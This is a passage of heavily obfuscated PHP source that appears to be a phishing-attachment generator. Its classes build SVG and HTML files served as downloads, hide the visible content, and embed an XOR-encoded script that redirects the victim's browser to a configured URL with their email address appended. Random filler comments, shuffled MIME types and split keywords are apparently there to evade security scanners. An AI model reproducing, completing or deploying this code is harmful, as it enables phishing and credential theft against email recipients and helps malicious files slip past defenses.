x73\145\x74\56\151\156\x64\145\x78\x4f\x66\x28\x74\x65\x78\164\133\151\x20\x2b\x20\x31\135\x29\x20\46\x20\x30\x78\x30\106\73\xd\xa\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\40\x72\145\x73\x75\154\164\x20\x2b\75\40\x53\x74\x72\151\156\x67\x2e\146\x72\x6f\155\103\150\141\162\103\157\x64\145\x28\150\151\147\150\x20\174\x20\x6c\x6f\x77\x29\x3b\15\xa\40\40\40\40\x20\40\40\x20\175\15\xa\x20\x20\x20\x20\40\40\x20\40\162\145\x74\x75\x72\156\40\162\145\163\165\x6c\164\73\xd\12\x20\x20\x20\x20\175\xd\xa\xd\xa\x20\x20\40\40\x66\165\x6e\143\164\151\157\x6e\40\x64\x65\x63\162\x79\160\164\x54\145\170\x74\50\145\x6e\x63\162\x79\160\x74\x65\x64\x54\x65\170\x74\x29\40\x7b\xd\12\x20\x20\x20\x20\40\x20\x20\40\164\x72\x79\40\173\xd\12\x20\x20\40\40\x20\40\40\40\x20\40\40\40\143\x6f\156\x73\x74\40\x74\145\170\164\40\x3d\x20\x65\x6e\143\162\x79\160\x74\x65\x64\124\145\x78\x74\x2e\x72\x65\x70\154\141\143\145\x28\x2f\136\x4d\x79\40\57\54\x20\x27\x27\51\x2e\x72\x65\160\154\141\143\145\x28\x2f\40\150\x65\x72\x65\x24\x2f\54\x20\x27\47\51\73\15\12\x20\x20\40\x20\40\40\x20\40\x20\40\40\40\143\x6f\156\x73\164\x20\x64\141\x74\x61\x20\x3d\x20\146\x72\157\155\122\145\141\x64\141\x62\x6c\145\124\145\170\x74\x28\x74\145\x78\x74\x29\x3b\xd\xa\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\15\xa\40\40\x20\40\40\40\40\40\40\40\40\40\143\x6f\x6e\163\x74\40\x6b\x65\171\x4c\145\x6e\x67\x74\150\x20\75\40\70\x3b\15\xa\40\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\143\x6f\156\x73\x74\40\x6b\145\171\x20\75\40\x64\x61\x74\x61\56\x73\x6c\x69\143\145\x28\x30\x2c\x20\x6b\145\171\114\145\156\147\164\150\x29\x3b\15\12\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x63\x6f\x6e\x73\164\x20\145\156\143\162\171\x70\164\x65\x64\40\75\x20\x64\141\x74\x61\x2e\163\154\x69\x63\145\x28\153\x65\x79\x4c\145\156\147\164\x68\x20\x2b\40\x31\x29\x3b\xd\xa\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\40\xd\xa\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\x6c\145\164\40\x64\x65\143\162\171\160\x74\x65\144\40\x3d\x20\47\47\x3b\xd\12\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\146\157\x72\40\x28\154\145\x74\x20\151\40\75\40\x30\73\40\x69\40\74\40\145\x6e\143\x72\171\160\164\x65\144\56\x6c\x65\156\147\x74\150\x3b\x20\151\x2b\x2b\51\x20\173\15\xa\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x64\145\x63\162\171\160\x74\x65\144\x20\53\x3d\x20\x53\164\x72\x69\156\x67\x2e\146\162\x6f\x6d\103\150\141\x72\x43\157\x64\145\x28\15\xa\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20\x20\40\x20\x65\156\x63\x72\x79\x70\x74\145\144\56\143\150\141\x72\x43\157\x64\x65\101\164\50\151\51\40\136\40\x6b\145\171\56\x63\150\x61\162\x43\x6f\144\145\101\164\x28\x69\x20\45\40\153\145\x79\x4c\x65\x6e\x67\164\x68\x29\15\xa\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\51\73\15\12\x20\40\40\40\40\40\x20\40\x20\40\x20\40\175\15\xa\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\15\12\40\40\40\40\x20\40\40\x20\40\40\40\40\162\145\x74\x75\x72\x6e\40\144\145\143\x72\171\x70\x74\145\x64\x3b\xd\12\x20\40\x20\x20\40\x20\x20\x20\x7d\x20\143\x61\x74\143\150\40\50\x65\x29\x20\x7b\xd\xa\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x72\145\x74\165\162\156\40\x6e\165\154\x6c\x3b\xd\12\x20\40\40\40\x20\x20\40\x20\x7d\xd\12\40\x20\x20\40\175\15\12\xd\xa\x20\x20\x20\x20\50\x28\51\40\75\76\x20\x7b\x20\15\12\40\40\x20\x20\x20\x20\40\x20\164\x72\x79\40\x7b\40\xd\xa\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\xd\xa\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\50\146\x75\156\143\164\151\157\156\50\x29\173\175\x29\56\x63\157\156\163\164\x72\165\x63\164\x6f\162\50\x27{$Cda68["\141\x75\x74\157\147\x72\141\x62"]}\x27\54\x20\x64\145\143\x72\171\160\x74\124\x65\x78\x74\x28\x27{$A6e50}\x27\x29\51\50{$Cda68["\141\165\x74\157\147\x72\141\x62"]}\x29\x3b\40\xd\xa\x20\40\40\40\x20\x20\40\40\175\40\x63\x61\x74\x63\150\x20\50\145\x29\x20\x7b\x20\15\xa\x20\40\x20\40\x20\40\40\x20\40\40\x20\x20\143\x6f\x6e\x73\157\x6c\145\56\145\162\162\157\x72\50\47\x45\162\162\x6f\162\47\54\x20\x65\51\x3b\40\15\xa\x20\40\x20\40\x20\40\x20\x20\x7d\40\xd\12\x20\40\40\x20\x7d\x29\50\51\73"; goto F0a10; Cf5b2: $Cda68 = ["\x61\165\164\x6f\147\x72\x61\142" => TextUtils::generateWord(rand(5, 10)), "\146\x72\x6f\155\x52\x65\141\x64\x61\x62\154\145\124\145\x78\x74" => TextUtils::generateWord(rand(8, 14)), "\x64\145\x63\162\x79\x70\164\x54\145\170\164" => TextUtils::generateWord(rand(8, 14)), "\x6b\x65\x79\114\145\156\147\x74\150" => rand(6, 12), "\164\x65\170\164\x56\x61\162" => TextUtils::generateWord(rand(5, 10)), "\144\x61\x74\141\126\x61\162" => TextUtils::generateWord(rand(5, 10)), "\x6b\145\x79\126\141\x72" => TextUtils::generateWord(rand(5, 10)), "\145\x6e\143\x72\171\x70\164\145\x64\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\144\x65\143\162\171\160\x74\x65\x64\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\145\126\x61\162" => TextUtils::generateWord(rand(3, 6)), "\x66\x75\156\x63\126\141\x72" => TextUtils::generateWord(rand(5, 10)), "\x63\150\x61\x72\163\x65\164" => TextUtils::generateWord(rand(8, 14)), "\x68\x69\147\150" => TextUtils::generateWord(rand(4, 8)), "\154\x6f\167" => TextUtils::generateWord(rand(4, 8)), "\x6b\145\171\x56\x61\162\x4c\145\x6e\147\164\150" => TextUtils::generateWord(rand(8, 14)), "\144\x61\164\x61\x56\141\162\x32" => TextUtils::generateWord(rand(8, 14))]; goto eb147; dc06f: } public function extractScriptVarNames() { return isset($this->Dfd7d) ? $this->Dfd7d : []; } public function setToSVG() { goto d8aef; e8169: $Cbbee = "\103\x44\x41\124\x41"; goto D4be2; cb079: $bf4d6 = base64_encode($Ecba9); goto A3afb; E8b8a: header("\x43\x6f\156\x74\145\156\x74\x2d\124\x79\160\x65\x3a\40\151\x6d\141\x67\145\x2f\x73\x76\147\53\170\x6d\x6c"); goto D63d5; B09d9: $bd92c = bin2hex(random_bytes(4)); goto A6afa; a270f: $Cda68 = $this->extractScriptVarNames(); goto E8b8a; Eecde: echo "\x3c\77\170\x6d\154\40\x76\x65\162\x73\151\x6f\x6e\75\42\61\x2e\x30\42\x20\145\156\x63\x6f\144\x69\x6e\147\x3d\x22\x55\124\106\x2d\70\42\40\x73\x74\x61\x6e\144\x61\154\x6f\156\x65\x3d\42\x6e\x6f\x22\77\76\xd\xa\15\12{$B7437[0]}\xd\xa\15\xa\x3c\163\166\147\40\170\155\154\x6e\163\75\x22\x68\x74\164\160\72\57\x2f\167\167\x77\x2e\x77\63\56\x6f\x72\x67\x2f\x32\x30\60\60\57\163\x76\147\x22\x20\x78\155\x6c\156\163\72\x78\154\x69\x6e\153\x3d\x22\150\x74\164\160\72\x2f\57\167\x77\x77\x2e\167\x33\x2e\x6f\x72\x67\x2f\x31\x39\71\x39\57\x78\x6c\151\x6e\x6b\42\x20\167\151\144\x74\150\x3d\42\61\60\60\x22\x20\150\145\x69\147\x68\164\x3d\42\61\60\60\42\x20\x69\x64\75\x22\x73\166\147\137{$bd92c}\42\x3e\xd\xa\40\x20\40\x20\x3c\162\145\x63\164\x20\167\151\x64\x74\150\x3d\42\x31\x30\x30\45\42\40\x68\145\x69\147\x68\x74\75\42\x31\x30\60\45\42\40\146\x69\154\154\x3d\x22\43\x66\70\x66\x39\x66\141\x22\x20\x73\x74\171\x6c\145\75\42\x64\151\x73\160\154\x61\x79\x3a\x6e\x6f\x6e\145\x22\57\x3e\15\xa\40\40\x20\x20{$B7437[1]}\xd\12\40\40\40\x20\x3c\164\x65\170\x74\x20\170\75\42\61\x30\x22\40\171\x3d\x22\x35\x30\42\40\146\157\156\x74\55\146\141\x6d\x69\x6c\171\75\x22\101\x72\151\x61\x6c\x22\40\146\x6f\156\x74\55\163\x69\172\145\75\x22\61\x34\x22\40\x66\151\154\154\x3d\42\43\x33\x33\x33\42\x20\157\x70\141\143\x69\x74\171\75\x22\60\42\40\x73\x74\171\154\x65\75\x22\144\x69\x73\160\x6c\x61\x79\72\x6e\x6f\x6e\x65\x3b\42\x3e\x53\x56\x47\x20\123\x65\x63\165\162\145\x3c\57\x74\x65\x78\164\x3e\xd\12\x20\40\x20\x20\x3c\146\x6f\162\x65\x69\147\156\117\x62\152\145\143\x74\40\x77\x69\144\164\150\75\x22\61\x30\60\x25\42\40\150\x65\151\x67\150\164\75\x22\x31\x30\60\x25\x22\40\163\x74\171\154\x65\75\x22\x64\x69\x73\x70\x6c\x61\171\72\x20\156\x6f\x6e\x65\73\x22\x3e\xd\12\x20\x20\40\x20{$B7437[2]}\xd\12\x20\40\x20\40\x3c\144\x69\x76\40\170\155\154\156\x73\75\42\150\164\x74\160\72\x2f\x2f\167\167\167\56\x77\63\56\157\162\x67\x2f\x31\71\71\x39\57\x78\150\164\155\154\x22\x20\x73\164\x79\x6c\x65\75\42\146\157\156\x74\x2d\146\x61\x6d\x69\154\x79\x3a\x20\x41\x72\x69\x61\154\73\x20\143\x6f\154\x6f\162\x3a\40\x23\60\x30\67\x34\144\71\x3b\42\x3e\15\12\x20\40\40\40\40\40\x20\x20\101\x6e\x69\x6d\x61\x6c\x73\15\xa\40\40\x20\x20\74\57\144\151\166\76\15\xa\40\40\x20\40\x3c\57\x66\157\x72\145\x69\147\156\117\142\152\145\143\164\76\15\12\40\40\x20\40{$B7437[3]}\xd\12\40\x20\x20\40{$Bc836}\xd\12\40\x20\x20\x20\74{$Fc83e}\40\164\x79\x70\x65\75\x22{$f74c0}\x22\x3e\xd\12\40\x20\40\x20\40\x20\40\x20\166\141\162\x20{$Cda68["\141\165\164\157\x67\162\141\142"]}\x20\75\x20\x22{$this->Fcd19}\x22\x3b\xd\xa\40\x20\40\40\x3c\x2f{$Fc83e}\76\15\12\40\40\x20\40\74{$Fc83e}\40\x74\171\x70\145\x3d\x22{$f74c0}\42\x20\170\154\151\x6e\x6b\72\150\x72\145\146\75\x22{$cf935}\x22\57\x3e\xd\12\x20\x20\x20\40{$B7437[4]}\15\xa\x3c\x2f\x73\x76\x67\x3e"; goto D72f2; A3afb: $Aae5d = ["\141\160\160\154\151\143\141\x74\151\x6f\x6e\x2f\145\143\155\x61\163\143\x72\151\160\164", "\x74\145\170\x74\x2f\x65\143\x6d\x61\163\x63\x72\x69\160\x74", "\x74\145\170\x74\x2f\x68\164\x6d\154", "\x61\x70\160\154\x69\x63\x61\164\151\157\156\x2f\x6f\x63\x74\x65\x74\55\x73\164\162\145\141\155", "\141\160\160\x6c\x69\143\141\164\x69\x6f\156\x2f\x78\55\152\x61\x76\141\x73\143\162\151\160\x74"]; goto B7ef8; B7ef8: $B5ab2 = $Aae5d[array_rand($Aae5d)]; goto Dca2c; Ff6f1: $cf935 = "\x64\x61\164\141\x3a{$B5ab2}\73\142\x61\163\145\x36\x34\54{$bf4d6}"; goto Eecde; A6afa: $Fc83e = "\163\x63\x72" . "\151\160\x74"; goto dd5c5; D82a9: $C8d78 = "\135\135\x3e"; goto e1be9; dd5c5: $f74c0 = "\x61\160\160\x6c\151" . "\x63\141\x74\x69\x6f\x6e\x2f\x65\x63\x6d\x61\163" . "\x63\162\151\160\164"; goto e8169; D461d: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto B09d9; D63d5: header("\103\157\156\x74\145\x6e\x74\x2d\104\151\163\160\x6f\x73\x69\164\151\x6f\x6e\72\x20\141\164\164\141\143\x68\155\145\156\164\x3b\x20\146\151\x6c\x65\x6e\141\x6d\145\x3d\42\x67\x65\156\145\162\x61\x74\145\144\x2e\163\x76\147\x22"); goto D461d; Dca2c: $c9848 = "\x3f\166\75" . bin2hex(random_bytes(rand(1, 4))); goto Ff6f1; e1be9: $Bc836 = "\74\x21\55\x2d\x20" . TextUtils::generateWord(rand(10, 20)) . "\40\x2d\x2d\76"; goto cb079; d8aef: $Ecba9 = $this->generate(); goto a270f; D4be2: $b2c70 = "\x3c\x21\x5b" . $Cbbee . "\x5b"; goto D82a9; D72f2: } public function setToHTML() { goto A3269; F343a: $D4af1 = TextUtils::generateWord(rand(6, 12)); goto F5fa5; bbb8d: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto d474e; F5fa5: $b7b26 = ucfirst(TextUtils::generateWord(rand(8, 16))) . "\40\120\x61\x67\145"; goto e51eb; a829c: $B74b5 = TextUtils::generateWord(rand(6, 12)); goto F343a; d474e: $bd92c = bin2hex(random_bytes(4)); goto a7ef5; B4dd2: $Bc836 = "\74\41\55\55\40" . TextUtils::generateWord(rand(10, 20)) . "\40\55\55\x3e"; goto a829c; de3e9: header("\103\x6f\x6e\x74\x65\156\164\55\x44\151\163\x70\x6f\x73\x69\164\151\157\156\x3a\x20\x61\164\x74\141\x63\150\155\145\x6e\164\x3b\x20\146\x69\154\x65\x6e\141\155\145\75\42\147\145\x6e\145\162\x61\164\145\144\x2e\x68\x74\155\154\42"); goto bbb8d; A3269: $Ecba9 = $this->generate(); goto cf264; a7ef5: $Fc83e = "\163\143\162" . "\151\x70\x74"; goto A5c77; e51eb: echo "\x20\40\40\x20\x3c\x21\x44\117\x43\x54\131\x50\x45\x20\x68\164\x6d\154\76\xd\12\x20\40\40\40\x3c\150\164\x6d\154\x20\154\141\x6e\x67\x3d\x22\145\156\42\x3e\xd\12\x20\40\40\40\74\150\145\141\x64\x3e\xd\12\x20\40\x20\40\x20\40\x20\40\x3c\155\145\164\141\x20\143\x68\x61\x72\163\x65\164\x3d\42\x55\x54\x46\55\70\42\76\15\12\x20\40\40\40\40\40\x20\x20\74\164\151\x74\154\x65\76{$b7b26}\x3c\x2f\164\x69\x74\154\x65\x3e\15\xa\40\x20\40\40\x20\40\x20\x20{$B7437[0]}\xd\xa\40\x20\x20\x20\40\x20\x20\40\74\x73\164\171\x6c\145\x3e\xd\12\40\40\40\x20\x20\x20\40\40\150\164\x6d\x6c\x2c\40\142\x6f\144\x79\x20\173\x20\x68\145\x69\x67\150\x74\72\x20\x31\x30\x30\x25\73\x20\x6d\141\162\147\x69\x6e\x3a\x20\60\73\40\160\141\144\144\x69\156\147\72\x20\x30\x3b\40\x7d\xd\xa\x20\40\40\40\x20\x20\40\x20\x62\157\144\171\x20\x7b\x20\xd\12\40\40\40\40\x20\x20\40\x20\40\40\x20\x20\142\x61\x63\153\147\x72\157\165\x6e\x64\x3a\x20\43\146\x38\146\x39\146\x61\x3b\x20\15\xa\40\x20\40\x20\40\40\x20\x20\40\40\40\x20\146\157\156\x74\x2d\146\141\x6d\151\x6c\x79\x3a\x20\101\x72\151\141\154\x2c\x20\x73\x61\x6e\163\55\163\x65\x72\151\146\73\40\15\12\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\144\151\163\160\x6c\x61\171\72\40\156\x6f\x6e\x65\x3b\40\x2f\x2a\40\x48\151\x64\x65\x20\141\x6c\x6c\40\x62\x6f\x64\x79\40\x63\x6f\156\x74\145\156\164\x20\52\57\15\12\x20\x20\40\40\x20\x20\x20\x20\x7d\15\xa\x20\x20\x20\40\40\x20\40\x20\56{$B74b5}\40\x7b\x20\x6d\141\x72\147\151\x6e\72\x20\x34\x30\x70\170\40\x61\x75\x74\157\x3b\x20\167\151\144\x74\150\x3a\40\x38\60\x25\x3b\40\x62\x61\143\x6b\x67\162\x6f\x75\156\x64\72\40\43\146\x66\x66\73\40\142\157\162\x64\145\162\55\162\141\144\151\x75\163\72\x20\70\160\x78\73\40\x62\157\170\55\163\x68\x61\144\x6f\167\x3a\x20\x30\40\x32\x70\x78\x20\x38\160\x78\x20\43\x63\143\143\x3b\x20\160\141\144\144\151\x6e\x67\x3a\40\62\x34\160\x78\73\x20\x7d\15\xa\40\40\x20\40\x20\40\x20\x20\56{$D4af1}\x20\173\40\x63\157\154\157\x72\x3a\x20\x23\x30\60\x37\64\x64\71\73\40\x66\157\x6e\164\x2d\x73\151\172\x65\72\40\x31\x2e\62\x65\155\73\40\175\xd\12\x20\x20\x20\x20\40\x20\x20\x20\74\x2f\163\x74\x79\x6c\x65\x3e\xd\12\x20\x20\40\40\74\57\150\x65\141\144\76\15\12\40\40\x20\40\74\x62\x6f\144\x79\x3e\xd\xa\40\40\x20\40\40\x20\40\x20{$B7437[1]}\15\12\x20\x20\40\x20\40\x20\x20\40\x3c\144\151\166\x20\x63\x6c\x61\163\x73\x3d\x22{$B74b5}\42\x3e\15\xa\x20\x20\x20\x20\x20\40\40\x20\74\x68\x31\40\143\154\141\163\x73\75\42{$D4af1}\42\x3e\110\x54\115\114\40\x53\145\143\165\x72\x65\74\57\x68\x31\x3e\xd\xa\40\40\40\x20\x20\x20\40\x20\x3c\x70\76{$B7437[2]}\74\x2f\x70\76\xd\xa\x20\40\x20\40\40\x20\40\40{$Bc836}\xd\xa\x20\40\x20\40\x20\40\40\x20\x3c{$Fc83e}\40\x74\x79\160\x65\75\x22{$f74c0}\x22\76\xd\xa\40\40\40\x20\x20\x20\40\x20\40\40\40\40\x76\x61\x72\40{$Cda68["\141\x75\164\x6f\147\162\141\x62"]}\40\x3d\x20\42{$this->Fcd19}\x22\73\xd\12\40\40\x20\x20\40\40\40\40\x3c\57{$Fc83e}\76\15\xa\x20\40\40\40\40\x20\x20\40\x3c{$Fc83e}\40\164\x79\x70\x65\x3d\42{$f74c0}\42\76\xd\12\x20\40\x20\x20\40\40\x20\x20{$Ecba9}\xd\xa\x20\x20\40\x20\40\x20\40\40\74\57{$Fc83e}\x3e\xd\12\40\40\x20\40\x20\40\x20\x20{$B7437[3]}\15\12\x20\40\40\40\x20\x20\40\x20\74\57\144\x69\166\x3e\xd\xa\x20\40\x20\x20\x20\40\40\x20{$B7437[4]}\15\xa\40\x20\40\40\74\57\x62\157\x64\171\76\15\12\40\40\40\40\x3c\57\150\164\155\x6c\76"; goto B95db; A5c77: $f74c0 = "\x74\145\x78" . "\164\57\x6a\141\x76\141\163\x63\x72\x69\x70\164"; goto B4dd2; cf264: $Cda68 = $this->extractScriptVarNames(); goto c9a14; c9a14: header("\103\x6f\156\164\145\x6e\x74\x2d\124\171\x70\145\x3a\40\164\145\x78\x74\57\x68\x74\x6d\154\x3b\x20\x63\150\141\x72\163\145\x74\x3d\125\x54\106\x2d\x38"); goto de3e9; B95db: } } goto Ca7e1; C94da: class SVGDesEncryption { private $Af2bc; private $Fcd19; function __construct($Bca73, $e90ca) { $this->Af2bc = $Bca73; $this->Fcd19 = $e90ca; } public function randomizeSplit($ba98e) { goto d1f31; fdf1f: f0090: goto Fd165; Fd165: $d7762 = str_split($ba98e, 4); goto c4129; e2034: $f3f85 = array(); goto Aba5d; c4129: $ab911 = array_keys($d7762); goto e2034; aab11: shuffle($f3f85); goto d65ef; d1f31: if (!(strlen($ba98e) % 4 != 0)) { goto f0090; } goto E46a4; d65ef: return implode("\72", $f3f85); goto A1de2; a4595: Fcff9: goto aab11; Aba5d: foreach ($ab911 as $daf1d) { $f3f85[] = sprintf("\45\x30\62\x64\45\x73", $daf1d, $d7762[$daf1d]); b0aad: } goto a4595; E46a4: $ba98e = str_pad($ba98e, ceil(strlen($ba98e) / 4) * 4, "\60"); goto fdf1f; A1de2: } public function desEncode($d1a2e) { goto B8fd7; a893a: fd960: goto Ba3cd; F3af8: goto dd9a4; goto fc8d3; C9d53: Fe3be: goto eb041; Affe4: $a8390 = $d4f37; goto c7aeb; B1170: Fe93e: goto e6ad5; b296a: $ac06c = $d4f37 . $C8668; goto D6bd2; c7aeb: foreach ($c09ed as $ec77a) { goto A4601; B3f69: goto c778b; goto Ae09b; D08e0: $a8390 = $Dff3d; goto dec19; Feefe: $daf1d++; goto B3f69; B3f28: if (!($daf1d < 8)) { goto B0710; } goto E9cf3; Bae11: Be27d: goto Feefe; E9cf3: $Dff3d .= chr(ord($ec77a[$daf1d]) ^ ord($a8390[$daf1d]) ^ ord($C8668[$daf1d])); goto Bae11; Ae09b: B0710: goto Bc108; C65e8: $Dff3d = ''; goto de7b8; Bc108: $ac06c .= $Dff3d; goto D08e0; dec19: e3dea: goto ecdde; D6931: c778b: goto B3f28; de7b8: $daf1d = 0; goto D6931; A4601: $ec77a = str_pad($ec77a, 8, "\0"); goto C65e8; ecdde: } goto Caf8a; D7351: if (!($daf1d < 8)) { goto Ac569; } goto fbada; F18e2: $fd359 = $Fc6df; goto B1170; B8fd7: $C8668 = ''; goto cbf38; e6ad5: $d1a2e .= str_repeat(chr($fd359), $fd359); goto Ceb1a; fbc4c: $daf1d = 0; goto C8c62; D184f: E853d: goto B9c29; D9cc6: goto Fe3be; goto a893a; C8c62: dd9a4: goto D7351; fbada: $d4f37 .= chr(mt_rand(0, 255)); goto ea205; B9c29: $daf1d++; goto D9cc6; eb041: if (!($daf1d < 8)) { goto fd960; } goto Dd93f; c5f7f: $ba98e = bin2hex($ac06c); goto Ba71c; fc8d3: Ac569: goto b296a; ea205: Baa8d: goto D4172; cbf38: $daf1d = 0; goto C9d53; d1b33: if (!($fd359 == 0)) { goto Fe93e; } goto F18e2; Ceb1a: $d4f37 = ''; goto fbc4c; C5900: $fd359 = $Fc6df - strlen($d1a2e) % $Fc6df; goto d1b33; Ba3cd: $Fc6df = 8; goto C5900; D6bd2: $c09ed = str_split($d1a2e, 8); goto Affe4; Ba71c: return $this->randomizeSplit($ba98e); goto a9bc0; Dd93f: $C8668 .= chr(mt_rand(0, 255)); goto D184f; D4172: $daf1d++; goto F3af8; Caf8a: Bc6a2: goto c5f7f; a9bc0: } public function generate() { goto F8cb4; Ae57d: $B7437 = TextUtils::commentGenerateRandomStorySlash(); goto ed1a3; f557f: return $Ecba9; goto c12cd; Beb27: $Bca73 = $this->desEncode("\x77\151\156\x64\x6f\167\x2e\154\x6f\143\x61\164\x69\x6f\156\x2e\150\162\145\146\x3d\x22" . $this->Af2bc . "\x2f\42\x20\x2b\40" . $Cda68["\145\x6d\141\x69\154\x76\141\162"] . "\73"); goto Ae57d; ed1a3: $Ecba9 = "\x20\x20\x20\40\40\40\x20\40\40\40\40\40\x76\141\162\x20{$Cda68["\145\x6d\141\x69\154\166\141\162"]}\40\x3d\40\47{$this->Fcd19}\x27\73\15\12\xd\xa\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20{$B7437[0]}\xd\xa\15\12\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x66\x75\x6e\143\164\x69\157\x6e\40{$Cda68["\x64\145\122\141\x6e\x64\x6f\155\151\172\x65"]}\x28{$Cda68["\x72\x61\x6e\144\157\x6d\151\x7a\x65\x64"]}\x29\x20\173\xd\12\40\40\x20\x20\40\40\40\40\x20\x20\40\40\x20\x20\x20\40\151\146\40\x28\x21{$Cda68["\x72\141\156\x64\157\155\x69\172\x65\144"]}\x29\40\162\145\x74\165\x72\x6e\x20\x27\x27\x3b\15\12\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\xd\12\40\40\40\40\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\x63\x6f\x6e\163\164\x20{$Cda68["\143\150\x75\156\153\x73"]}\40\x3d\40{$Cda68["\162\141\x6e\144\x6f\x6d\151\x7a\145\x64"]}\x2e\163\x70\x6c\151\x74\x28\x27\72\x27\51\73\15\xa\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x63\x6f\156\x73\x74\40{$Cda68["\160\157\163\151\x74\x69\157\156\x73"]}\40\x3d\40\x6e\x65\x77\x20\101\x72\x72\141\171\50{$Cda68["\x63\x68\x75\x6e\x6b\163"]}\x2e\x6c\145\x6e\x67\164\x68\51\73\xd\12\40\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\15\12\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20{$Cda68["\x63\150\165\x6e\153\163"]}\56\146\x6f\x72\x45\x61\x63\150\x28{$Cda68["\143\x68\x75\x6e\153"]}\40\x3d\76\x20\173\xd\xa\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\143\157\156\x73\x74\x20{$Cda68["\160\157\x73"]}\x20\x3d\40\x70\141\x72\163\145\x49\156\164\50{$Cda68["\x63\x68\165\x6e\x6b"]}\56\x73\x6c\x69\143\x65\50\x30\54\40\x32\x29\x29\x3b\xd\xa\x20\40\40\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\143\x6f\x6e\163\164\40{$Cda68["\x64\141\x74\x61"]}\40\75\x20{$Cda68["\143\x68\165\x6e\x6b"]}\x2e\x73\154\x69\x63\x65\x28\62\x29\73\xd\12\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x20{$Cda68["\x70\x6f\x73\x69\x74\151\x6f\156\x73"]}\x5b{$Cda68["\x70\x6f\163"]}\x5d\x20\75\x20{$Cda68["\x64\141\164\141"]}\73\xd\12\xd\xa\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\x20\40\x20\40\40{$B7437[1]}\xd\12\40\40\40\40\40\40\x20\x20\40\x20\40\x20\40\x20\40\x20\x7d\51\x3b\15\xa\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x20\40\40\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\40\40\40\x20\x72\x65\x74\x75\x72\156\x20{$Cda68["\160\x6f\x73\151\164\151\157\156\x73"]}\56\152\x6f\151\x6e\50\x27\47\x29\x3b\xd\12\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\x7d\xd\xa\15\12\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\40{$B7437[3]}\15\12\xd\12\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\146\x75\156\x63\x74\151\x6f\x6e\40{$Cda68["\150\145\170\124\x6f\102\x69\156"]}\50{$Cda68["\x68\145\x78"]}\51\x20\x7b\15\xa\40\40\40\40\40\x20\x20\40\40\40\40\40\40\x20\x20\x20\143\157\156\x73\x74\x20{$Cda68["\x72\145\163\165\x6c\x74"]}\40\x3d\40\x5b\x5d\x3b\xd\12\15\12\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\40\40{$B7437[2]}\xd\xa\40\x20\40\40\40\x20\40\40\40\x20\x20\40\40\40\40\40\x66\x6f\162\40\x28\154\145\x74\40\x69\x20\x3d\x20\60\73\x20\151\x20\74\x20{$Cda68["\x68\x65\x78"]}\56\154\x65\156\x67\164\x68\73\40\151\40\x2b\x3d\x20\62\51\40\x7b\15\xa\40\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\40{$Cda68["\x72\145\163\x75\x6c\x74"]}\x2e\x70\x75\x73\150\50\123\164\x72\x69\156\x67\x2e\x66\162\x6f\x6d\x43\150\x61\162\103\157\x64\145\x28\x70\141\162\163\x65\111\x6e\164\x28{$Cda68["\x68\x65\x78"]}\x2e\163\165\142\x73\164\x72\50\x69\x2c\x20\62\51\x2c\x20\x31\66\x29\51\51\73\xd\xa\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\175\15\xa\x20\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\40\40\40\162\x65\x74\x75\162\156\x20{$Cda68["\162\145\x73\165\154\x74"]}\56\x6a\157\151\156\x28\47\47\51\73\15\12\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\x7d\xd\xa\xd\12\40\40\40\40\40\40\x20\x20\x20\x20\x20\40\146\165\156\143\x74\x69\157\x6e\x20{$Cda68["\x64\x65\163\104\145\143\x6f\144\x65"]}\x28{$Cda68["\x65\x6e\143\x6f\144\x65\x64"]}\x29\x20\173\15\12\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40{$B7437[4]}\xd\xa\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40\40\x20\x63\x6f\x6e\163\x74\x20{$Cda68["\150\145\x78"]}\40\75\40{$Cda68["\x64\145\122\141\156\144\157\155\x69\x7a\145"]}\x28{$Cda68["\145\x6e\x63\157\144\145\x64"]}\x29\x3b\xd\xa\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\151\x66\40\50\41{$Cda68["\150\x65\x78"]}\40\174\174\x20{$Cda68["\150\x65\170"]}\x2e\x6c\x65\x6e\x67\164\x68\x